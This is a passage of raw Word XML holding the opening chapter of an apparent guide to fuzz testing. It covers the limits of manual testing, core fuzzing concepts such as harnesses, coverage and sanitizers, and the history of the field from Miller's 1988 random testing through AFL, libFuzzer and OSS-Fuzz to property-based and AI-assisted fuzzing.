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rn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fuzz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Date"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2025-08-15</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="47" w:name="X386a4db7a8fa0759423637585463dffdcec8672"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 1: Introduction to Modern Fuzz Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">"The real problem is not whether machines think but whether men do." - B.F. Skinner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your software processes inputs you never imagined, handles combinations you never tested, and fails in ways you never anticipated. Every application sits at the intersection of expected behavior and chaotic reality—​and that intersection is where the most dangerous bugs hide.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="Xcaaa11e97adbc813f51dfe939287c1af423fcc8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Problem: When Testing Meets Reality</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Picture this scenario: Your web application handles file uploads perfectly during development. Your test suite covers standard image formats, validates file sizes, and checks security permissions. Everything works flawlessly until a user uploads a malformed PNG file with corrupted metadata that crashes your image processing library, taking down the entire service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This isn’t a failure of testing—​it’s a limitation of human imagination. Traditional testing approaches excel at validating known scenarios: documented features, expected user workflows, and anticipated error conditions. But they share a fundamental constraint: they only test what developers think to test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modern applications face an explosion of complexity that defeats manual testing approaches.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Consider a typical web service that accepts JSON requests. A simple API endpoint with five parameters, each accepting string values up to 1000 characters, creates roughly 256^5000 possible input combinations per parameter. That’s more test cases than there are atoms in the observable universe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now multiply that by dozens of endpoints, add database interactions, include network communications with external services, and factor in concurrent user requests. The input space becomes so vast that exhaustive testing approaches mathematical impossibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yet attackers and edge cases don’t respect the boundaries of your test imagination. They explore the dark corners where your testing never ventured. They discover the precise input combinations that reveal buffer overflows, trigger race conditions, or expose business logic errors that compromise system integrity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Most teams default to reactive strategies: monitor production systems, respond quickly to incidents, and patch problems after they surface.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This made sense when applications ran in controlled environments with predictable inputs. But your applications now operate in hostile environments where any input could trigger system failure, and waiting for problems to surface means your users find the bugs before you do.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="X21add3e6809b5388fdec35d288b470195b8413b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why Manual Testing Hits Its Limits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual testing strategies follow predictable patterns that create predictable blind spots. Test cases focus on expected user behaviors rather than adversarial inputs. Boundary testing checks obvious limits like maximum string lengths but misses subtle interactions between parameters. Error handling tests verify documented failure modes but ignore the infinite variations of malformed data that real systems encounter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Human testers think like humans, not like systems.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">They create logical test scenarios that follow reasonable user workflows. They validate that applications behave correctly when users follow documented procedures. But systems don’t fail because users follow documentation—​they fail when inputs violate unstated assumptions, when timing creates unexpected interactions, and when edge cases reveal implementation flaws.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security professionals understand this limitation intuitively. Penetration testing specifically seeks inputs that violate normal usage patterns. But even security testing constrained by human imagination only explores attack vectors that someone thought to try. The most dangerous vulnerabilities often hide in the intersection of multiple edge cases that no human tester would think to combine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s the uncomfortable truth: comprehensive manual testing of complex applications is impossible within practical time and resource constraints.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">You’re forced to choose between shipping software with unknown vulnerabilities or delaying releases indefinitely while attempting exhaustive validation. Neither option works in competitive markets that demand both speed and reliability.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="X1cb41d3446a5b94f9810276c3ac562c82d4e1f5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Business Cost of Unknown Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Production failures carry costs that extend beyond immediate technical remediation. According to DevOps Research and Assessment (DORA) studies, high-performing organizations deploy code 208 times more frequently than low performers while maintaining stability through systematic testing practices that catch failures before production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Service outages directly impact revenue and customer satisfaction.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">E-commerce platforms lose an average of $5,600 per minute during peak shopping periods according to Gremlin’s State of Chaos Engineering report. Financial services face regulatory scrutiny when transaction processing fails, with potential fines reaching millions of dollars for system outages that affect customer access to funds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data corruption incidents require extensive recovery efforts that may never fully restore compromised information integrity. Healthcare organizations risk patient safety when critical systems become unavailable, while manufacturing systems halt production lines when control software encounters unexpected conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The cost-benefit analysis favors proactive testing approaches.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fixing bugs during development costs approximately 5-10 times less than fixing them in production, according to software engineering research by Barry Boehm. When security vulnerabilities are involved, the cost differential increases further due to incident response procedures, regulatory reporting requirements, and potential legal liability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Organizations that adopt systematic testing practices report measurable improvements in deployment confidence and operational stability. The 2023 State of DevOps report found that teams with comprehensive automated testing deploy 2.6 times more frequently while experiencing 70% fewer change-related failures than teams relying primarily on manual testing approaches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">But what does "systematic testing" actually look like in practice?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Traditional approaches hit mathematical limits, business costs keep rising, and manual testing can’t scale with modern complexity. Enter fuzz testing—​an approach that automates the exploration your manual testing could never achieve.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="26" w:name="X5d70bf465753c912416dd604245164fecfaa72a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What Is Fuzz Testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuzz testing—​often simply called "fuzzing"--systematically generates test inputs to discover how applications behave under unexpected conditions. Instead of manually crafting test cases based on specifications, fuzzing tools automatically create thousands or millions of inputs and observe application responses to find crashes, hangs, memory corruption, or other anomalous behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s the core insight that changes everything: if you generate enough diverse inputs and monitor application behavior systematically, you’ll discover failure modes that manual testing would never find.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This automated exploration scales beyond human capabilities while maintaining systematic coverage that random testing alone cannot achieve.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="X719f1610ff070ceec4476ca55671e15e5e1ac23"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Core Concepts and Definitions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzzing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is the practice of automatically generating test inputs to find bugs, vulnerabilities, and reliability issues in software applications. The term originates from "fuzz"--random, unexpected, or malformed data that stresses applications beyond their normal operating parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A fuzzer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is the tool that generates test inputs and executes them against target applications. Modern fuzzers range from simple random input generators to sophisticated systems that use runtime feedback to guide exploration toward previously unexplored application behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A harness</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is the interface code that connects fuzzers to target applications. Harnesses determine how fuzzers generate inputs, how applications process those inputs, and how the testing system detects interesting behaviors. Well-designed harnesses enable deep exploration of application logic, while poorly designed harnesses limit testing to superficial input validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Coverage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">measures which parts of application code execute during fuzzing campaigns. Code coverage tracks which functions, branches, or statements execute for different inputs. Modern fuzzers use coverage feedback to guide input generation toward areas of code that haven’t been explored thoroughly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are runtime analysis tools that detect subtle bugs that might not cause immediate crashes. AddressSanitizer finds memory corruption issues like buffer overflows and use-after-free conditions. UndefinedBehaviorSanitizer catches violations of language specifications that could lead to unpredictable program behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Corpus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">refers to the collection of test inputs that a fuzzer uses as starting points for mutation and generation. Initial corpus seeds provide examples of valid inputs that help fuzzers understand expected input formats. The corpus grows during fuzzing as tools discover inputs that exercise new application behaviors.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="X2b43c92bf0f6ad8ef5e1fade4d7d5600fa3a031"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Property-Based Testing vs Example-Based Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional testing validates specific examples: "when I call this function with these parameters, it should return this specific result." Property-based testing validates universal rules: "regardless of input, this function should never crash, should always preserve data integrity, and should satisfy mathematical invariants."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Property-based fuzzing defines correctness rules that should hold for all possible inputs.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">For example, a sorting algorithm should always return arrays where elements appear in ascending order and contain exactly the same elements as the input. A JSON parser should either successfully parse valid JSON or fail gracefully with clear error messages—​it should never crash or corrupt memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This distinction changes how developers think about correctness. Instead of testing individual scenarios, teams articulate the fundamental properties that define correct behavior, then automatically verify these properties across thousands of generated test cases.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="X186057bb854df583dd6c8714893f4126671fd07"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security vs Reliability Focus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Early fuzzing research focused primarily on security vulnerability discovery, particularly memory corruption bugs that enable code execution attacks. This security emphasis created a perception that fuzzing serves primarily as a security testing technique for finding exploitable vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modern fuzzing transcends this narrow security focus to encompass comprehensive reliability engineering.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">While security vulnerabilities remain important discoveries, fuzzing also finds logic errors, performance degradation conditions, data corruption scenarios, and integration failures that affect overall system robustness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This broader perspective recognizes that applications fail in many ways that don’t trigger memory safety violations. Infinite loops that consume CPU resources without making progress. Logic errors that corrupt application state without triggering crashes. Race conditions that cause intermittent failures under specific timing conditions. Configuration parsing errors that prevent applications from starting correctly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The evolution from security tool to reliability engineering discipline reflects broader changes in software development practices.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Organizations increasingly recognize that systematic exploration of failure modes provides value beyond vulnerability discovery, improving overall software quality and operational confidence.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="31" w:name="X9f8dc219f061f6040a50cf8e8d75fc520b5e521"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">History and Evolution: From Random Testing to Intelligent Exploration</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="27" w:name="Xa2f9c4de17dcc52c4acb05ed66dc4ad7752d2fa"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Origins: Random Input Generation (1980s-1990s)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuzz testing emerged from early research into automatic test generation conducted by Professor Barton Miller at the University of Wisconsin in 1988. Miller’s original work focused on testing Unix utilities by feeding them random character sequences and observing whether they crashed or hung.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The initial approach was remarkably simple: generate random data, feed it to applications, and see what breaks.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Miller’s students discovered that roughly one-third of Unix utilities would crash when given random inputs—​a shocking result that demonstrated how many applications failed to handle unexpected data gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This early research established fundamental principles that continue to influence modern fuzzing: systematic input generation can discover bugs that manual testing misses, automated testing scales beyond human capabilities, and applications fail in ways that developers don’t anticipate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, random input generation had significant limitations. Most applications expect structured inputs—​file formats, network protocols, or configuration syntax—​and purely random data rarely creates inputs that exercise complex application logic. Random fuzzers spent most of their time triggering input validation errors rather than exploring deeper application behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Academic research during the 1990s explored grammar-based input generation and protocol-aware fuzzing,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">but these approaches required extensive manual effort to specify input formats and remained primarily research tools rather than practical engineering solutions.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="X70fb4b0dc4d38b52a88b756bf093ebe7774aa76"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Coverage Revolution: AFL and Guided Exploration (2010s)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The breakthrough that transformed fuzzing from academic curiosity to practical engineering tool came with the development of coverage-guided fuzzing, most notably implemented in American Fuzzy Lop (AFL) by Michał Zalewski at Google.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AFL introduced the revolutionary concept of using runtime feedback to guide input generation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Instead of generating purely random inputs, AFL monitors which code paths each test case exercises, then mutates successful inputs to explore adjacent code regions. This guidance enables fuzzers to navigate complex input validation routines and reach deep application states where serious bugs often hide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The impact was immediate and measurable. AFL discovered thousands of vulnerabilities in widely-used software, including critical bugs in image processing libraries, network protocol implementations, and system utilities. The tool’s effectiveness sparked widespread adoption across security teams and development organizations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Coverage guidance solved the fundamental limitation of random fuzzing: the inability to generate inputs that exercise complex application logic. By using execution feedback to evolve test cases, AFL could bypass input validation routines, navigate protocol state machines, and trigger bugs that required precise input conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Google’s adoption of AFL for testing Chrome and Android components demonstrated fuzzing’s value for large-scale software development.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The company reported discovering hundreds of security vulnerabilities and reliability issues that traditional testing approaches had missed, leading to increased investment in fuzzing infrastructure and tool development.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="X1945459ef2aed716a3d44e317128728611f7dc2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration with Development Workflows (2010s-Present)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The next major evolution involved integrating fuzzing into standard software development practices rather than treating it as a specialized security testing activity. Tools like libFuzzer, developed as part of the LLVM project, enabled developers to embed fuzzing directly into their testing workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">libFuzzer introduced persistent fuzzing that eliminates process startup overhead, enabling millions of test cases per second.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This performance improvement made fuzzing practical for testing library functions and API endpoints that require high-throughput exploration to discover subtle bugs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Simultaneously, cloud platforms began offering fuzzing-as-a-service through initiatives like OSS-Fuzz, which provides continuous fuzzing for open-source projects. These platforms handle infrastructure management, coordinate testing across multiple projects, and provide systematic bug reporting that integrates with existing development workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer integration became standard practice during this period.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AddressSanitizer, UndefinedBehaviorSanitizer, and other runtime analysis tools detect subtle bugs that might not cause immediate crashes but indicate serious underlying issues. This integration expanded fuzzing beyond crash discovery to comprehensive correctness validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Major technology companies began investing heavily in fuzzing infrastructure. Microsoft’s Security Development Lifecycle integrated fuzzing requirements for critical components. Apple’s security team used fuzzing to validate iOS and macOS system components. Facebook (now Meta) developed custom fuzzing tools for testing social media platform components at scale.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="X454ba56228aa124c5a0b41b2bdd70efb1e1a935"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern Era: Property-Based Testing and AI Enhancement (2020s-Present)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Current fuzzing evolution focuses on intelligent test generation that goes beyond coverage-guided mutation. Tools like Google’s FuzzTest enable property-based testing where developers define correctness rules that should hold for all inputs, then automatically generate test cases to verify these properties.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Property-based approaches shift focus from finding crashes to validating correctness.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Instead of just discovering inputs that cause applications to fail catastrophically, modern fuzzing verifies that applications satisfy business logic constraints, maintain data integrity, and handle edge cases gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Machine learning and large language model integration represents the newest frontier. AI-enhanced fuzzers can generate semantically valid inputs for complex data formats, understand application context to create more effective test cases, and learn from previous testing campaigns to improve future exploration strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The trajectory continues toward comprehensive correctness validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that ensures applications behave correctly under all conditions, not just that they don’t crash. This evolution aligns with broader industry trends toward continuous testing, automated quality assurance, and reliability engineering that treats system robustness as a primary design concern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This evolution matters because it shows how fuzzing has matured from academic curiosity to essential engineering practice. But understanding the history is just the beginning—​what matters for your daily work is how modern fuzzing transforms different roles within development organizations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="36" w:name="X0e602aad360401f418de88d4576bac8b1e46b51"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
